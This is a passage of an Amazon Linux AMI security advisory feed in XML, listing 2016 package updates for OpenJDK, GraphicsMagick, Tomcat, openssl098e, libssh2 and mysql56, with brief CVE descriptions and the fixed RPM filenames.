CVE-2016-0636 OpenJDK: out-of-band urgent security fix (Hotspot, 8151666)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0636" title="" id="CVE-2016-0636" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk-demo" version="1.8.0.77" release="0.b03.9.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.77-0.b03.9.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.77" release="0.b03.9.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.77-0.b03.9.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.77" release="0.b03.9.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.77-0.b03.9.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.77" release="0.b03.9.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.77-0.b03.9.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.77" release="0.b03.9.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.77-0.b03.9.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.77" release="0.b03.9.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.77-0.b03.9.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.77" release="0.b03.9.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.77-0.b03.9.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.77" release="0.b03.9.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.77-0.b03.9.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.77" release="0.b03.9.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.77-0.b03.9.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.77" release="0.b03.9.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.77-0.b03.9.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.77" release="0.b03.9.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.77-0.b03.9.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.77" release="0.b03.9.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.77-0.b03.9.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.77" release="0.b03.9.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.77-0.b03.9.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.99" release="2.6.5.0.66.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.99-2.6.5.0.66.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.99" release="2.6.5.0.66.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.99-2.6.5.0.66.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.99" release="2.6.5.0.66.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.99-2.6.5.0.66.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.99" release="2.6.5.0.66.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.99-2.6.5.0.66.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.99" release="2.6.5.0.66.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.99-2.6.5.0.66.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.99" release="2.6.5.0.66.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.99-2.6.5.0.66.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.99" release="2.6.5.0.66.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.99-2.6.5.0.66.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.99" release="2.6.5.0.66.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.99-2.6.5.0.66.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.99" release="2.6.5.0.66.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.99-2.6.5.0.66.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.99" release="2.6.5.0.66.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.99-2.6.5.0.66.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.99" release="2.6.5.0.66.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.99-2.6.5.0.66.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-678</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-678: medium priority package update for GraphicsMagick</title><issued date="2016-03-30 17:45:00" /><updated date="2016-03-30 17:45:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-8808:
An out-of-bounds read flaw was found in the parsing of GIF files using GraphicsMagick.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8808" title="" id="CVE-2015-8808" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="GraphicsMagick-perl" version="1.3.23" release="5.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-perl-1.3.23-5.7.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-c++" version="1.3.23" release="5.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-c++-1.3.23-5.7.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-c++-devel" version="1.3.23" release="5.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-c++-devel-1.3.23-5.7.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-devel" version="1.3.23" release="5.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-devel-1.3.23-5.7.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick" version="1.3.23" release="5.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-1.3.23-5.7.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-debuginfo" version="1.3.23" release="5.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-debuginfo-1.3.23-5.7.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-doc" version="1.3.23" release="5.7.amzn1" epoch="0" arch="noarch"><filename>Packages/GraphicsMagick-doc-1.3.23-5.7.amzn1.noarch.rpm</filename></package><package name="GraphicsMagick-c++" version="1.3.23" release="5.7.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-c++-1.3.23-5.7.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-devel" version="1.3.23" release="5.7.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-devel-1.3.23-5.7.amzn1.i686.rpm</filename></package><package name="GraphicsMagick" version="1.3.23" release="5.7.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-1.3.23-5.7.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-debuginfo" version="1.3.23" release="5.7.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-debuginfo-1.3.23-5.7.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-c++-devel" version="1.3.23" release="5.7.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-c++-devel-1.3.23-5.7.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-perl" version="1.3.23" release="5.7.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-perl-1.3.23-5.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-679</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-679: medium priority package update for tomcat8</title><issued date="2016-03-29 15:30:00" /><updated date="2016-03-29 15:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-0763:
The setGlobalContext method in org/apache/naming/factory/ResourceLinkFactory.java in Apache Tomcat 7.x before 7.0.68, 8.x before 8.0.31, and 9.x before 9.0.0.M3 does not consider whether ResourceLinkFactory.setGlobalContext callers are authorized, which allows remote authenticated users to bypass intended SecurityManager restrictions and read or write to arbitrary application data, or cause a denial of service (application disruption), via a web application that sets a crafted global context.
1311093:
CVE-2016-0763 tomcat: security manager bypass via setGlobalContext()
CVE-2016-0714:
The session-persistence implementation in Apache Tomcat 6.x before 6.0.45, 7.x before 7.0.68, 8.x before 8.0.31, and 9.x before 9.0.0.M2 mishandles session attributes, which allows remote authenticated users to bypass intended SecurityManager restrictions and execute arbitrary code in a privileged context via a web application that places a crafted object in a session.
1311082:
CVE-2016-0714 tomcat: Security Manager bypass via persistence mechanisms
CVE-2016-0706:
Apache Tomcat 6.x before 6.0.45, 7.x before 7.0.68, 8.x before 8.0.31, and 9.x before 9.0.0.M2 does not place org.apache.catalina.manager.StatusManagerServlet on the org/apache/catalina/core/RestrictedServlets.properties list, which allows remote authenticated users to bypass intended SecurityManager restrictions and read arbitrary HTTP requests, and consequently discover session ID values, via a crafted web application.
1311087:
CVE-2016-0706 tomcat: security manager bypass via StatusManagerServlet
CVE-2015-5351:
The (1) Manager and (2) Host Manager applications in Apache Tomcat 7.x before 7.0.68, 8.x before 8.0.31, and 9.x before 9.0.0.M2 establish sessions and send CSRF tokens for arbitrary new requests, which allows remote attackers to bypass a CSRF protection mechanism by using a token.
1311076:
CVE-2015-5351 tomcat: CSRF token leak
CVE-2015-5346:
Session fixation vulnerability in Apache Tomcat 7.x before 7.0.66, 8.x before 8.0.30, and 9.x before 9.0.0.M2, when different session settings are used for deployments of multiple versions of the same web application, might allow remote attackers to hijack web sessions by leveraging use of a requestedSessionSSL field for an unintended request, related to CoyoteAdapter.java and Request.java.
1311085:
CVE-2015-5346 tomcat: Session fixation
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5346" title="" id="CVE-2015-5346" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5351" title="" id="CVE-2015-5351" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0706" title="" id="CVE-2016-0706" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0714" title="" id="CVE-2016-0714" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0763" title="" id="CVE-2016-0763" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8" version="8.0.32" release="1.59.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.0.32-1.59.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.0.32" release="1.59.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.0.32-1.59.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.0.32" release="1.59.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.0.32-1.59.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.0.32" release="1.59.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.0.32-1.59.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.0.32" release="1.59.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.0.32-1.59.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.0.32" release="1.59.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.0.32-1.59.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.0.32" release="1.59.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.0.32-1.59.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.0.32" release="1.59.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.0.32-1.59.amzn1.noarch.rpm</filename></package><package name="tomcat8-log4j" version="8.0.32" release="1.59.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.0.32-1.59.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.0.32" release="1.59.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.0.32-1.59.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-680</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-680: medium priority package update for tomcat7</title><issued date="2016-03-29 15:30:00" /><updated date="2016-03-29 15:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-0763:
The setGlobalContext method in org/apache/naming/factory/ResourceLinkFactory.java in Apache Tomcat 7.x before 7.0.68, 8.x before 8.0.31, and 9.x before 9.0.0.M3 does not consider whether ResourceLinkFactory.setGlobalContext callers are authorized, which allows remote authenticated users to bypass intended SecurityManager restrictions and read or write to arbitrary application data, or cause a denial of service (application disruption), via a web application that sets a crafted global context.
1311093:
CVE-2016-0763 tomcat: security manager bypass via setGlobalContext()
CVE-2016-0714:
The session-persistence implementation in Apache Tomcat 6.x before 6.0.45, 7.x before 7.0.68, 8.x before 8.0.31, and 9.x before 9.0.0.M2 mishandles session attributes, which allows remote authenticated users to bypass intended SecurityManager restrictions and execute arbitrary code in a privileged context via a web application that places a crafted object in a session.
1311082:
CVE-2016-0714 tomcat: Security Manager bypass via persistence mechanisms
CVE-2016-0706:
Apache Tomcat 6.x before 6.0.45, 7.x before 7.0.68, 8.x before 8.0.31, and 9.x before 9.0.0.M2 does not place org.apache.catalina.manager.StatusManagerServlet on the org/apache/catalina/core/RestrictedServlets.properties list, which allows remote authenticated users to bypass intended SecurityManager restrictions and read arbitrary HTTP requests, and consequently discover session ID values, via a crafted web application.
1311087:
CVE-2016-0706 tomcat: security manager bypass via StatusManagerServlet
CVE-2015-5351:
The (1) Manager and (2) Host Manager applications in Apache Tomcat 7.x before 7.0.68, 8.x before 8.0.31, and 9.x before 9.0.0.M2 establish sessions and send CSRF tokens for arbitrary new requests, which allows remote attackers to bypass a CSRF protection mechanism by using a token.
1311076:
CVE-2015-5351 tomcat: CSRF token leak
CVE-2015-5345:
The Mapper component in Apache Tomcat 6.x before 6.0.45, 7.x before 7.0.67, 8.x before 8.0.30, and 9.x before 9.0.0.M2 processes redirects before considering security constraints and Filters, which allows remote attackers to determine the existence of a directory via a URL that lacks a trailing / (slash) character.
1311089:
CVE-2015-5345 tomcat: directory disclosure
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5345" title="" id="CVE-2015-5345" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5351" title="" id="CVE-2015-5351" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0706" title="" id="CVE-2016-0706" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0714" title="" id="CVE-2016-0714" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0763" title="" id="CVE-2016-0763" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat7-servlet-3.0-api" version="7.0.68" release="1.15.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-servlet-3.0-api-7.0.68-1.15.amzn1.noarch.rpm</filename></package><package name="tomcat7-jsp-2.2-api" version="7.0.68" release="1.15.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-jsp-2.2-api-7.0.68-1.15.amzn1.noarch.rpm</filename></package><package name="tomcat7-admin-webapps" version="7.0.68" release="1.15.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-admin-webapps-7.0.68-1.15.amzn1.noarch.rpm</filename></package><package name="tomcat7-lib" version="7.0.68" release="1.15.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-lib-7.0.68-1.15.amzn1.noarch.rpm</filename></package><package name="tomcat7-docs-webapp" version="7.0.68" release="1.15.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-docs-webapp-7.0.68-1.15.amzn1.noarch.rpm</filename></package><package name="tomcat7-webapps" version="7.0.68" release="1.15.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-webapps-7.0.68-1.15.amzn1.noarch.rpm</filename></package><package name="tomcat7-log4j" version="7.0.68" release="1.15.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-log4j-7.0.68-1.15.amzn1.noarch.rpm</filename></package><package name="tomcat7" version="7.0.68" release="1.15.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-7.0.68-1.15.amzn1.noarch.rpm</filename></package><package name="tomcat7-javadoc" version="7.0.68" release="1.15.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-javadoc-7.0.68-1.15.amzn1.noarch.rpm</filename></package><package name="tomcat7-el-2.2-api" version="7.0.68" release="1.15.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-el-2.2-api-7.0.68-1.15.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-681</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-681: medium priority package update for tomcat6</title><issued date="2016-03-29 15:30:00" /><updated date="2016-03-29 15:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-0714:
The session-persistence implementation in Apache Tomcat 6.x before 6.0.45, 7.x before 7.0.68, 8.x before 8.0.31, and 9.x before 9.0.0.M2 mishandles session attributes, which allows remote authenticated users to bypass intended SecurityManager restrictions and execute arbitrary code in a privileged context via a web application that places a crafted object in a session.
1311082:
CVE-2016-0714 tomcat: Security Manager bypass via persistence mechanisms
CVE-2016-0706:
Apache Tomcat 6.x before 6.0.45, 7.x before 7.0.68, 8.x before 8.0.31, and 9.x before 9.0.0.M2 does not place org.apache.catalina.manager.StatusManagerServlet on the org/apache/catalina/core/RestrictedServlets.properties list, which allows remote authenticated users to bypass intended SecurityManager restrictions and read arbitrary HTTP requests, and consequently discover session ID values, via a crafted web application.
1311087:
CVE-2016-0706 tomcat: security manager bypass via StatusManagerServlet
CVE-2015-5345:
The Mapper component in Apache Tomcat 6.x before 6.0.45, 7.x before 7.0.67, 8.x before 8.0.30, and 9.x before 9.0.0.M2 processes redirects before considering security constraints and Filters, which allows remote attackers to determine the existence of a directory via a URL that lacks a trailing / (slash) character.
1311089:
CVE-2015-5345 tomcat: directory disclosure
CVE-2015-5174:
Directory traversal vulnerability in RequestUtil.java in Apache Tomcat 6.x before 6.0.45, 7.x before 7.0.65, and 8.x before 8.0.27 allows remote authenticated users to bypass intended SecurityManager restrictions and list a parent directory via a /.. (slash dot dot) in a pathname used by a web application in a getResource, getResourceAsStream, or getResourcePaths call, as demonstrated by the $CATALINA_BASE/webapps directory.
1265698:
CVE-2015-5174 tomcat: URL Normalization issue
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5174" title="" id="CVE-2015-5174" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5345" title="" id="CVE-2015-5345" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0706" title="" id="CVE-2016-0706" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0714" title="" id="CVE-2016-0714" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat6-jsp-2.1-api" version="6.0.45" release="1.4.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-jsp-2.1-api-6.0.45-1.4.amzn1.noarch.rpm</filename></package><package name="tomcat6" version="6.0.45" release="1.4.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-6.0.45-1.4.amzn1.noarch.rpm</filename></package><package name="tomcat6-admin-webapps" version="6.0.45" release="1.4.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-admin-webapps-6.0.45-1.4.amzn1.noarch.rpm</filename></package><package name="tomcat6-servlet-2.5-api" version="6.0.45" release="1.4.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-servlet-2.5-api-6.0.45-1.4.amzn1.noarch.rpm</filename></package><package name="tomcat6-docs-webapp" version="6.0.45" release="1.4.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-docs-webapp-6.0.45-1.4.amzn1.noarch.rpm</filename></package><package name="tomcat6-el-2.1-api" version="6.0.45" release="1.4.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-el-2.1-api-6.0.45-1.4.amzn1.noarch.rpm</filename></package><package name="tomcat6-webapps" version="6.0.45" release="1.4.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-webapps-6.0.45-1.4.amzn1.noarch.rpm</filename></package><package name="tomcat6-lib" version="6.0.45" release="1.4.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-lib-6.0.45-1.4.amzn1.noarch.rpm</filename></package><package name="tomcat6-javadoc" version="6.0.45" release="1.4.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-javadoc-6.0.45-1.4.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-682</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-682: important priority package update for openssl098e</title><issued date="2016-04-06 14:40:00" /><updated date="2016-04-06 14:40:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-0800:
A padding oracle flaw was found in the Secure Sockets Layer version 2.0 (SSLv2) protocol. An attacker could potentially use this flaw to decrypt RSA-encrypted cipher text from a connection using a newer SSL/TLS protocol version, allowing them to decrypt such connections. This cross-protocol attack is publicly referred to as DROWN.
A padding oracle flaw was found in the Secure Sockets Layer version 2.0 (SSLv2) protocol. An attacker can potentially use this flaw to decrypt RSA-encrypted cipher text from a connection using a newer SSL/TLS protocol version, allowing them to decrypt such connections. This cross-protocol attack is publicly referred to as DROWN.
1310593:
CVE-2016-0800 SSL/TLS: Cross-protocol attack on TLS using SSLv2 (DROWN)
CVE-2016-0704:
It was discovered that the SSLv2 protocol implementation in OpenSSL did not properly implement the Bleichenbacher protection for export cipher suites. An attacker could use a SSLv2 server using OpenSSL as a Bleichenbacher oracle.
1310814:
CVE-2016-0704 openssl: SSLv2 Bleichenbacher protection overwrites wrong bytes for export ciphers
CVE-2016-0703:
It was discovered that the SSLv2 servers using OpenSSL accepted SSLv2 connection handshakes that indicated non-zero clear key length for non-export cipher suites. An attacker could use this flaw to decrypt recorded SSLv2 sessions with the server by using it as a decryption oracle.
1310811:
CVE-2016-0703 openssl: Divide-and-conquer session key recovery in SSLv2
CVE-2015-3197:
A flaw was found in the way malicious SSLv2 clients could negotiate SSLv2 ciphers that were disabled on the server. This could result in weak SSLv2 ciphers being used for SSLv2 connections, making them vulnerable to man-in-the-middle attacks.
A flaw was found in the way malicious SSLv2 clients could negotiate SSLv2 ciphers that have been disabled on the server. This could result in weak SSLv2 ciphers being used for SSLv2 connections, making them vulnerable to man-in-the-middle attacks.
1301846:
CVE-2015-3197 OpenSSL: SSLv2 doesn't block disabled ciphers
CVE-2015-0293:
A denial of service flaw was found in the way OpenSSL handled certain SSLv2 messages. A malicious client could send a specially crafted SSLv2 CLIENT-MASTER-KEY message that would cause an OpenSSL server that both supports SSLv2 and enables EXPORT-grade cipher suites to crash.
A denial of service flaw was found in the way OpenSSL handled SSLv2 handshake messages. A remote attacker could use this flaw to cause a TLS/SSL server using OpenSSL to exit on a failed assertion if it had both the SSLv2 protocol and EXPORT-grade cipher suites enabled.
1202404:
CVE-2015-0293 openssl: assertion failure in SSLv2 servers
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0293" title="" id="CVE-2015-0293" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3197" title="" id="CVE-2015-3197" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0703" title="" id="CVE-2016-0703" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0704" title="" id="CVE-2016-0704" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0800" title="" id="CVE-2016-0800" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl098e" version="0.9.8e" release="29.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl098e-0.9.8e-29.19.amzn1.x86_64.rpm</filename></package><package name="openssl098e-debuginfo" version="0.9.8e" release="29.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssl098e-debuginfo-0.9.8e-29.19.amzn1.x86_64.rpm</filename></package><package name="openssl098e" version="0.9.8e" release="29.19.amzn1" epoch="0" arch="i686"><filename>Packages/openssl098e-0.9.8e-29.19.amzn1.i686.rpm</filename></package><package name="openssl098e-debuginfo" version="0.9.8e" release="29.19.amzn1" epoch="0" arch="i686"><filename>Packages/openssl098e-debuginfo-0.9.8e-29.19.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-683</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-683: medium priority package update for libssh2</title><issued date="2016-04-06 14:40:00" /><updated date="2016-04-06 14:40:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-0787:
A type confusion issue was found in the way libssh2 generated ephemeral secrets for the diffie-hellman-group1 and diffie-hellman-group14 key exchange methods. This would cause an SSHv2 Diffie-Hellman handshake to use significantly less secure random parameters.
1306021:
CVE-2016-0787 libssh2: bits/bytes confusion resulting in truncated Diffie-Hellman secret length
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0787" title="" id="CVE-2016-0787" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libssh2-docs" version="1.4.2" release="2.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libssh2-docs-1.4.2-2.13.amzn1.x86_64.rpm</filename></package><package name="libssh2" version="1.4.2" release="2.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libssh2-1.4.2-2.13.amzn1.x86_64.rpm</filename></package><package name="libssh2-devel" version="1.4.2" release="2.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libssh2-devel-1.4.2-2.13.amzn1.x86_64.rpm</filename></package><package name="libssh2-debuginfo" version="1.4.2" release="2.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libssh2-debuginfo-1.4.2-2.13.amzn1.x86_64.rpm</filename></package><package name="libssh2" version="1.4.2" release="2.13.amzn1" epoch="0" arch="i686"><filename>Packages/libssh2-1.4.2-2.13.amzn1.i686.rpm</filename></package><package name="libssh2-devel" version="1.4.2" release="2.13.amzn1" epoch="0" arch="i686"><filename>Packages/libssh2-devel-1.4.2-2.13.amzn1.i686.rpm</filename></package><package name="libssh2-debuginfo" version="1.4.2" release="2.13.amzn1" epoch="0" arch="i686"><filename>Packages/libssh2-debuginfo-1.4.2-2.13.amzn1.i686.rpm</filename></package><package name="libssh2-docs" version="1.4.2" release="2.13.amzn1" epoch="0" arch="i686"><filename>Packages/libssh2-docs-1.4.2-2.13.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-684</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-684: important priority package update for mysql56</title><issued date="2016-04-06 14:40:00" /><updated date="2016-04-06 14:40:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-0616:
